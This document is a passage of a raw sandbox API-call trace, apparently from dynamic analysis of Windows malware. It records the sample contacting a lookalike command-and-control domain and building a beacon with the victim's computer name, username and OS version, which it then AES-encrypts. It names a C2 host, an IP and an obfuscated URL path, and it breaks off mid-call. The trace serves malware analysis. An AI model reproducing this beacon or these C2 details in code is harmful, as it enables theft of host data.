(lpString="trackingg-protectioon.cdn4.mozilla.net/fonts/anvl4DF57tb/vO3Ek6luLQbT8h/JCj0Cwe5R_2FsSEW_2F6m/AdqS_2FBQBTM3A38/e16lxOdem_2FC9B/REt8qjmv3slYYsziWz/_2B6XrVHY/YP_2Fq5AQfH7PJXFoADI/kENXDGD2u4eMPVjQpYm/Ry3tHLEhmzmi1MOw7Vb8P1/2dt1Aw0cbB0md/_2BstSCY/JtjAHr6yz74VOTpMLOHoXai/9eH1oFs5eI/mjlJCAa7Te7xSKcIV/A3itFTqdSvr6/bMZ2mKJNhDP/nfDlpWVt5zhXu_/2BiWPl8pSWHhoQsLr0Vpy/L6TtA5O7rEool8FvAWp/ms.bak") returned 384 [0170.620] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x181) returned 0x2c5fbb0 [0170.620] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x181) returned 0x2c5fd40 [0170.620] StrChrA (lpStart="trackingg-protectioon.cdn4.mozilla.net/fonts/anvl4DF57tb/vO3Ek6luLQbT8h/JCj0Cwe5R_2FsSEW_2F6m/AdqS_2FBQBTM3A38/e16lxOdem_2FC9B/REt8qjmv3slYYsziWz/_2B6XrVHY/YP_2Fq5AQfH7PJXFoADI/kENXDGD2u4eMPVjQpYm/Ry3tHLEhmzmi1MOw7Vb8P1/2dt1Aw0cbB0md/_2BstSCY/JtjAHr6yz74VOTpMLOHoXai/9eH1oFs5eI/mjlJCAa7Te7xSKcIV/A3itFTqdSvr6/bMZ2mKJNhDP/nfDlpWVt5zhXu_/2BiWPl8pSWHhoQsLr0Vpy/L6TtA5O7rEool8FvAWp/ms.bak", wMatch=0x2f) returned="/fonts/anvl4DF57tb/vO3Ek6luLQbT8h/JCj0Cwe5R_2FsSEW_2F6m/AdqS_2FBQBTM3A38/e16lxOdem_2FC9B/REt8qjmv3slYYsziWz/_2B6XrVHY/YP_2Fq5AQfH7PJXFoADI/kENXDGD2u4eMPVjQpYm/Ry3tHLEhmzmi1MOw7Vb8P1/2dt1Aw0cbB0md/_2BstSCY/JtjAHr6yz74VOTpMLOHoXai/9eH1oFs5eI/mjlJCAa7Te7xSKcIV/A3itFTqdSvr6/bMZ2mKJNhDP/nfDlpWVt5zhXu_/2BiWPl8pSWHhoQsLr0Vpy/L6TtA5O7rEool8FvAWp/ms.bak" [0170.620] StrChrA (lpStart="trackingg-protectioon.cdn4.mozilla.net/fonts/anvl4DF57tb/vO3Ek6luLQbT8h/JCj0Cwe5R_2FsSEW_2F6m/AdqS_2FBQBTM3A38/e16lxOdem_2FC9B/REt8qjmv3slYYsziWz/_2B6XrVHY/YP_2Fq5AQfH7PJXFoADI/kENXDGD2u4eMPVjQpYm/Ry3tHLEhmzmi1MOw7Vb8P1/2dt1Aw0cbB0md/_2BstSCY/JtjAHr6yz74VOTpMLOHoXai/9eH1oFs5eI/mjlJCAa7Te7xSKcIV/A3itFTqdSvr6/bMZ2mKJNhDP/nfDlpWVt5zhXu_/2BiWPl8pSWHhoQsLr0Vpy/L6TtA5O7rEool8FvAWp/ms.bak", wMatch=0x3f) returned 0x0 [0170.620] memcpy (in: _Dst=0x2c5fbb0, _Src=0x2c5f238, _Size=0x26 | out: _Dst=0x2c5fbb0) returned 0x2c5fbb0 [0170.620] lstrcpyA (in: lpString1=0x2c5fd40, lpString2="/fonts/anvl4DF57tb/vO3Ek6luLQbT8h/JCj0Cwe5R_2FsSEW_2F6m/AdqS_2FBQBTM3A38/e16lxOdem_2FC9B/REt8qjmv3slYYsziWz/_2B6XrVHY/YP_2Fq5AQfH7PJXFoADI/kENXDGD2u4eMPVjQpYm/Ry3tHLEhmzmi1MOw7Vb8P1/2dt1Aw0cbB0md/_2BstSCY/JtjAHr6yz74VOTpMLOHoXai/9eH1oFs5eI/mjlJCAa7Te7xSKcIV/A3itFTqdSvr6/bMZ2mKJNhDP/nfDlpWVt5zhXu_/2BiWPl8pSWHhoQsLr0Vpy/L6TtA5O7rEool8FvAWp/ms.bak" | out: lpString1="/fonts/anvl4DF57tb/vO3Ek6luLQbT8h/JCj0Cwe5R_2FsSEW_2F6m/AdqS_2FBQBTM3A38/e16lxOdem_2FC9B/REt8qjmv3slYYsziWz/_2B6XrVHY/YP_2Fq5AQfH7PJXFoADI/kENXDGD2u4eMPVjQpYm/Ry3tHLEhmzmi1MOw7Vb8P1/2dt1Aw0cbB0md/_2BstSCY/JtjAHr6yz74VOTpMLOHoXai/9eH1oFs5eI/mjlJCAa7Te7xSKcIV/A3itFTqdSvr6/bMZ2mKJNhDP/nfDlpWVt5zhXu_/2BiWPl8pSWHhoQsLr0Vpy/L6TtA5O7rEool8FvAWp/ms.bak") returned="/fonts/anvl4DF57tb/vO3Ek6luLQbT8h/JCj0Cwe5R_2FsSEW_2F6m/AdqS_2FBQBTM3A38/e16lxOdem_2FC9B/REt8qjmv3slYYsziWz/_2B6XrVHY/YP_2Fq5AQfH7PJXFoADI/kENXDGD2u4eMPVjQpYm/Ry3tHLEhmzmi1MOw7Vb8P1/2dt1Aw0cbB0md/_2BstSCY/JtjAHr6yz74VOTpMLOHoXai/9eH1oFs5eI/mjlJCAa7Te7xSKcIV/A3itFTqdSvr6/bMZ2mKJNhDP/nfDlpWVt5zhXu_/2BiWPl8pSWHhoQsLr0Vpy/L6TtA5O7rEool8FvAWp/ms.bak" [0170.621] lstrlenA (lpString="/fonts/anvl4DF57tb/vO3Ek6luLQbT8h/JCj0Cwe5R_2FsSEW_2F6m/AdqS_2FBQBTM3A38/e16lxOdem_2FC9B/REt8qjmv3slYYsziWz/_2B6XrVHY/YP_2Fq5AQfH7PJXFoADI/kENXDGD2u4eMPVjQpYm/Ry3tHLEhmzmi1MOw7Vb8P1/2dt1Aw0cbB0md/_2BstSCY/JtjAHr6yz74VOTpMLOHoXai/9eH1oFs5eI/mjlJCAa7Te7xSKcIV/A3itFTqdSvr6/bMZ2mKJNhDP/nfDlpWVt5zhXu_/2BiWPl8pSWHhoQsLr0Vpy/L6TtA5O7rEool8FvAWp/ms.bak") returned 346 [0170.621] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x2b5) returned 0x2be00d8 [0170.621] InternetCanonicalizeUrlA (lpszUrl="/fonts/anvl4DF57tb/vO3Ek6luLQbT8h/JCj0Cwe5R_2FsSEW_2F6m/AdqS_2FBQBTM3A38/e16lxOdem_2FC9B/REt8qjmv3slYYsziWz/_2B6XrVHY/YP_2Fq5AQfH7PJXFoADI/kENXDGD2u4eMPVjQpYm/Ry3tHLEhmzmi1MOw7Vb8P1/2dt1Aw0cbB0md/_2BstSCY/JtjAHr6yz74VOTpMLOHoXai/9eH1oFs5eI/mjlJCAa7Te7xSKcIV/A3itFTqdSvr6/bMZ2mKJNhDP/nfDlpWVt5zhXu_/2BiWPl8pSWHhoQsLr0Vpy/L6TtA5O7rEool8FvAWp/ms.bak", lpszBuffer=0x2be00d8, lpdwBufferLength=0x11ff040, dwFlags=0x0) [0170.621] InternetCanonicalizeUrlA (in: lpszUrl="/fonts/anvl4DF57tb/vO3Ek6luLQbT8h/JCj0Cwe5R_2FsSEW_2F6m/AdqS_2FBQBTM3A38/e16lxOdem_2FC9B/REt8qjmv3slYYsziWz/_2B6XrVHY/YP_2Fq5AQfH7PJXFoADI/kENXDGD2u4eMPVjQpYm/Ry3tHLEhmzmi1MOw7Vb8P1/2dt1Aw0cbB0md/_2BstSCY/JtjAHr6yz74VOTpMLOHoXai/9eH1oFs5eI/mjlJCAa7Te7xSKcIV/A3itFTqdSvr6/bMZ2mKJNhDP/nfDlpWVt5zhXu_/2BiWPl8pSWHhoQsLr0Vpy/L6TtA5O7rEool8FvAWp/ms.bak", lpszBuffer=0x2be00d8, lpdwBufferLength=0x11ff040, dwFlags=0x0 | out: lpszBuffer="/fonts/anvl4DF57tb/vO3Ek6luLQbT8h/JCj0Cwe5R_2FsSEW_2F6m/AdqS_2FBQBTM3A38/e16lxOdem_2FC9B/REt8qjmv3slYYsziWz/_2B6XrVHY/YP_2Fq5AQfH7PJXFoADI/kENXDGD2u4eMPVjQpYm/Ry3tHLEhmzmi1MOw7Vb8P1/2dt1Aw0cbB0md/_2BstSCY/JtjAHr6yz74VOTpMLOHoXai/9eH1oFs5eI/mjlJCAa7Te7xSKcIV/A3itFTqdSvr6/bMZ2mKJNhDP/nfDlpWVt5zhXu_/2BiWPl8pSWHhoQsLr0Vpy/L6TtA5O7rEool8FvAWp/ms.bak", lpdwBufferLength=0x11ff040) returned 1 [0170.622] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fd40 | out: hHeap=0x2860000) returned 1 [0170.622] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x10000000) [0170.622] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x10000000) returned 0xcc0004 [0170.622] InternetSetStatusCallbackA (hInternet=0xcc0004, lpfnInternetCallback=0x2f7bbd) returned 0x0 [0170.623] ResetEvent (hEvent=0x38c) returned 1 [0170.623] InternetConnectA (hInternet=0xcc0004, lpszServerName="trackingg-protectioon.cdn4.mozilla.net", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x11ff074) [0170.623] InternetConnectA (hInternet=0xcc0004, lpszServerName="trackingg-protectioon.cdn4.mozilla.net", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x11ff074) returned 0xcc0008 [0170.623] SetEvent (hEvent=0x38c) returned 1 [0170.623] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/fonts/anvl4DF57tb/vO3Ek6luLQbT8h/JCj0Cwe5R_2FsSEW_2F6m/AdqS_2FBQBTM3A38/e16lxOdem_2FC9B/REt8qjmv3slYYsziWz/_2B6XrVHY/YP_2Fq5AQfH7PJXFoADI/kENXDGD2u4eMPVjQpYm/Ry3tHLEhmzmi1MOw7Vb8P1/2dt1Aw0cbB0md/_2BstSCY/JtjAHr6yz74VOTpMLOHoXai/9eH1oFs5eI/mjlJCAa7Te7xSKcIV/A3itFTqdSvr6/bMZ2mKJNhDP/nfDlpWVt5zhXu_/2BiWPl8pSWHhoQsLr0Vpy/L6TtA5O7rEool8FvAWp/ms.bak", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84404000, dwContext=0x11ff074) returned 0xcc000c [0170.624] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x11ff044, lpdwBufferLength=0x11ff040 | out: lpBuffer=0x11ff044, lpdwBufferLength=0x11ff040) returned 1 [0170.624] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x11ff044*, dwBufferLength=0x4) returned 1 [0170.624] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x6, lpBuffer=0x11ff03c*, dwBufferLength=0x4) returned 1 [0170.624] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x5, lpBuffer=0x11ff03c*, dwBufferLength=0x4) returned 1 [0170.624] ResetEvent (hEvent=0x38c) returned 1 [0170.624] ResetEvent (hEvent=0x3a0) returned 1 [0170.624] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 0 [0170.624] GetLastError () returned 0x3e5 [0170.624] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x0) returned 0x102 [0170.624] HttpQueryInfoA (hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x11ff0a0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0) [0170.624] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x11ff0a0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x11ff0a0*, lpdwBufferLength=0x11ff054*=0x4, lpdwIndex=0x11ff04c*=0x0) returned 1 [0170.624] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff02c*=0x38c, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0170.628] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x0) returned 0x0 [0170.628] SetEvent (hEvent=0x38c) returned 1 [0170.628] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff048*=0x3a0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x102 [0180.631] InternetSetStatusCallbackA (hInternet=0xcc000c, lpfnInternetCallback=0x0) returned 0x2f7bbd [0180.631] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0180.631] InternetSetStatusCallbackA (hInternet=0xcc0008, lpfnInternetCallback=0x0) returned 0x2f7bbd [0180.631] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0180.631] InternetSetStatusCallbackA (hInternet=0xcc0004, lpfnInternetCallback=0x0) returned 0x2f7bbd [0180.631] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0180.631] CloseHandle (hObject=0x38c) returned 1 [0180.631] CloseHandle (hObject=0x3a0) returned 1 [0180.632] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fbb0 | out: hHeap=0x2860000) returned 1 [0180.636] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2be00d8 | out: hHeap=0x2860000) returned 1 [0180.636] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0180.637] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fa40 | out: hHeap=0x2860000) returned 1 [0180.637] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5f238 | out: hHeap=0x2860000) returned 1 [0180.638] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59a68 | out: hHeap=0x2860000) returned 1 [0180.638] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5a510 | out: hHeap=0x2860000) returned 1 [0180.639] SetWaitableTimer (hTimer=0x13c, lpDueTime=0x11ff168, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) [0180.639] SetWaitableTimer (hTimer=0x13c, lpDueTime=0x11ff168, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) returned 1 [0180.639] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff170*=0x13c, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0190.653] wsprintfA (param_1=0x11ff104, param_2="size=%u&hash=0x%08x") [0190.653] wsprintfA (in: param_1=0x11ff104, param_2="size=%u&hash=0x%08x" | out: param_1="size=0&hash=0x00000000") returned 22 [0190.654] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x800) returned 0x2c5a510 [0190.654] wsprintfA (in: param_1=0x2c5a510, param_2="soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x" | out: param_1="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1") returned 84 [0190.654] QueryPerformanceFrequency (in: lpFrequency=0x11ff0b8 | out: lpFrequency=0x11ff0b8*=100000000) returned 1 [0190.655] QueryPerformanceCounter (in: lpPerformanceCount=0x11ff0b0 | out: lpPerformanceCount=0x11ff0b0*=2857098368142) returned 1 [0190.655] wsprintfA (in: param_1=0x2c5a564, param_2="&uptime=%u" | out: param_1="&uptime=28570") returned 13 [0190.656] wsprintfA (in: param_1=0x2c5a571, param_2="&%s" | out: param_1="&size=0&hash=0x00000000") returned 23 [0190.656] wsprintfA (in: param_1=0x2c5a588, param_2="&action=%08x" | out: param_1="&action=00000000") returned 16 [0190.656] GetComputerNameExA (NameType=0x3, lpBuffer=0x0, nSize=0x11ff0bc) [0190.656] GetComputerNameExA (in: NameType=0x3, lpBuffer=0x0, nSize=0x11ff0bc | out: lpBuffer=0x0, nSize=0x11ff0bc) returned 0 [0190.659] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xc) returned 0x2c5ea50 [0190.659] GetComputerNameExA (in: NameType=0x3, lpBuffer=0x2c5ea50, nSize=0x11ff0bc | out: lpBuffer="Q9iATrkPrH", nSize=0x11ff0bc) returned 1 [0190.659] wsprintfA (in: param_1=0x2c5a598, param_2="&dns=%s" | out: param_1="&dns=Q9iATrkPrH") returned 15 [0190.659] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5ea50 | out: hHeap=0x2860000) returned 1 [0190.659] GetUserNameW (lpBuffer=0x0, pcbBuffer=0x11ff0bc) [0190.659] GetUserNameW (in: lpBuffer=0x0, pcbBuffer=0x11ff0bc | out: lpBuffer=0x0, pcbBuffer=0x11ff0bc) returned 0 [0190.662] GetComputerNameW (lpBuffer=0x0, nSize=0x11ff0bc) [0190.662] GetComputerNameW (in: lpBuffer=0x0, nSize=0x11ff0bc | out: lpBuffer=0x0, nSize=0x11ff0bc) returned 0 [0190.662] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x5c) returned 0x2c59b28 [0190.662] GetUserNameW (in: lpBuffer=0x2c59b56, pcbBuffer=0x11ff0bc | out: lpBuffer="kEecfMwgj", pcbBuffer=0x11ff0bc) returned 1 [0190.662] GetComputerNameW (in: lpBuffer=0x2c59b6a, nSize=0x11ff0b8 | out: lpBuffer="Q9IATRKPRH", nSize=0x11ff0b8) returned 1 [0190.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kEecfMwgj@Q9IATRKPRH", cchWideChar=20, lpMultiByteStr=0x2c59b28, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kEecfMwgj@Q9IATRKPRHO3Ek6luLQbT8h/JCj0Cwe5R_2Fk", lpUsedDefaultChar=0x0) returned 20 [0190.662] wsprintfA (in: param_1=0x2c5a5a7, param_2="&whoami=%s" | out: param_1="&whoami=kEecfMwgj@Q9IATRKPRH") returned 28 [0190.663] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0190.663] lstrlenA (lpString="80.77.23.77") [0190.663] lstrlenA (lpString="80.77.23.77") returned 11 [0190.663] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xc) returned 0x2c5ea50 [0190.663] memcpy (in: _Dst=0x2c5ea50, _Src=0x2c59e3f, _Size=0xb | out: _Dst=0x2c5ea50) returned 0x2c5ea50 [0190.663] wsprintfA (in: param_1=0x2c5a5c3, param_2="&os=%s" | out: param_1="&os=6.1_1_7601_x64") returned 18 [0190.663] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x800) returned 0x2c5f238 [0190.663] GetTickCount () returned 0x1b0fe8c [0190.664] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x7) returned 0x2c59a68 [0190.664] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x5) returned 0x2c59a78 [0190.664] lstrlenA (lpString="%s=%s&") returned 6 [0190.664] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x11) returned 0x2c59b28 [0190.664] sprintf (_Dest=0x2c59b28, _Format="%s=%s&") [0190.664] sprintf (in: _Dest=0x2c59b28, _Format="%s=%s&" | out: _Dest="dmqf=ahgumt&") returned 12 [0190.664] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59a78 | out: hHeap=0x2860000) returned 1 [0190.664] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59a68 | out: hHeap=0x2860000) returned 1 [0190.664] lstrlenA (lpString="dmqf=ahgumt&") returned 12 [0190.664] lstrlenA (lpString="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28570&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned 197 [0190.664] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xd2) returned 0x2c59b48 [0190.664] strcpy (_Dest=0x2c59b48, _Source="dmqf=ahgumt&") [0190.664] strcpy (in: _Dest=0x2c59b48, _Source="dmqf=ahgumt&" | out: _Dest="dmqf=ahgumt&") returned="dmqf=ahgumt&" [0190.664] lstrcatA (lpString1="dmqf=ahgumt&", lpString2="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28570&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") [0190.664] lstrcatA (in: lpString1="dmqf=ahgumt&", lpString2="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28570&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64" | out: lpString1="dmqf=ahgumt&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28570&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned="dmqf=ahgumt&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28570&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64" [0190.664] lstrlenA (lpString="dmqf=ahgumt&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28570&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned 209 [0190.664] CryptAcquireContextW (phProv=0x11ff064, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) [0190.664] CryptAcquireContextW (in: phProv=0x11ff064, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x11ff064*=0x7917d8) returned 1 [0190.667] memcpy (in: _Dst=0x11ff044, _Src=0x2c59df8, _Size=0x10 | out: _Dst=0x11ff044) returned 0x11ff044 [0190.667] CryptImportKey (hProv=0x7917d8, pbData=0x11ff038*, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x0, phKey=0x11ff070) [0190.667] CryptImportKey (in: hProv=0x7917d8, pbData=0x11ff038*, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x0, phKey=0x11ff070 | out: phKey=0x11ff070*=0x77d2f8) returned 1 [0190.667] CryptSetKeyParam (hKey=0x77d2f8, dwParam=0x1, pbData=0x11ff054, dwFlags=0x0) [0190.667] CryptSetKeyParam (hKey=0x77d2f8, dwParam=0x1, pbData=0x11ff054, dwFlags=0x0) returned 1 [0190.667] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xe0) returned 0x2c59c28 [0190.667] memcpy (in: _Dst=0x2c59c28, _Src=0x2c59b48, _Size=0x10 | out: _Dst=0x2c59c28) returned 0x2c59c28 [0190.667] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c28*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c28*, pdwDataLen=0x11ff074*=0x10) returned 1 [0190.667] memcpy (in: _Dst=0x2c59c38, _Src=0x2c59b58, _Size=0x10 | out: _Dst=0x2c59c38) returned 0x2c59c38 [0190.667] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c38*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c38*, pdwDataLen=0x11ff074*=0x10) returned 1 [0190.667] memcpy (in: _Dst=0x2c59c48, _Src=0x2c59b68, _Size=0x10 | out: _Dst=0x2c59c48) returned 0x2c59c48 [0190.667] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c48*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c48*, pdwDataLen=0x11ff074*=0x10) returned 1 [0190.667] memcpy (in: _Dst=0x2c59c58, _Src=0x2c59b78, _Size=0x10 | out: _Dst=0x2c59c58) returned 0x2c59c58 [0190.667] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c58*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c58*, pdwDataLen=0x11ff074*=0x10) returned 1 [0190.667] memcpy (in: _Dst=0x2c59c68, _Src=0x2c59b88, _Size=0x10 | out: _Dst=0x2c59c68) returned 0x2c59c68 [0190.667] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c68*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c68*, pdwDataLen=0x11ff074*=0x10) returned 1 [0190.667] memcpy (in: _Dst=0x2c59c78, _Src=0x2c59b98, _Size=0x10 | out: _Dst=0x2c59c78) returned 0x2c59c78 [0190.667] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c78*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c78*, pdwDataLen=0x11ff074*=0x10) returned 1 [0190.667] memcpy (in: _Dst=0x2c59c88, _Src=0x2c59ba8, _Size=0x10 | out: _Dst=0x2c59c88) returned 0x2c59c88 [0190.667] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c88*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c88*, pdwDataLen=0x11ff074*=0x10) returned 1 [0190.667] memcpy (in: _Dst=0x2c59c98, _Src=0x2c59bb8, _Size=0x10 | out: _Dst=0x2c59c98) returned 0x2c59c98 [0190.667] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c98*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c98*, pdwDataLen=0x11ff074*=0x10) returned 1 [0190.668] memcpy (in: _Dst=0x2c59ca8, _Src=0x2c59bc8, _Size=0x10 | out: _Dst=0x2c59ca8) returned 0x2c59ca8 [0190.668] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59ca8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59ca8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0190.668] memcpy (in: _Dst=0x2c59cb8, _Src=0x2c59bd8, _Size=0x10 | out: _Dst=0x2c59cb8) returned 0x2c59cb8 [0190.668] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cb8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cb8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0190.668] memcpy (in: _Dst=0x2c59cc8, _Src=0x2c59be8, _Size=0x10 | out: _Dst=0x2c59cc8) returned 0x2c59cc8 [0190.668] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cc8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cc8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0190.668] memcpy (in: _Dst=0x2c59cd8, _Src=0x2c59bf8, _Size=0x10 | out: _Dst=0x2c59cd8) returned 0x2c59cd8 [0190.668] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cd8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cd8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0190.668] memcpy (in: _Dst=0x2c59ce8, _Src=0x2c59c08, _Size=0x10 | out: _Dst=0x2c59ce8) returned 0x2c59ce8 [0190.668] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59ce8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59ce8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0190.668] memcpy (in: _Dst=0x2c59cf8, _Src=0x2c59c18, _Size=0x2 | out: _Dst=0x2c59cf8) returned 0x2c59cf8 [0190.668] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2c59cf8*, pdwDataLen=0x11ff074*=0x2, dwBufLen=0x20 | out: pbData=0x2c59cf8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0190.668] CryptDestroyKey (hKey=0x77d2f8) returned 1 [0190.668] CryptReleaseContext (hProv=0x7917d8, dwFlags=0x0) [0190.668] CryptReleaseContext (hProv=0x7917d8, dwFlags=0x0) returned 1 [0190.668] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x1c0) returned 0x2c5fa40 [0190.669] HeapFree (in: 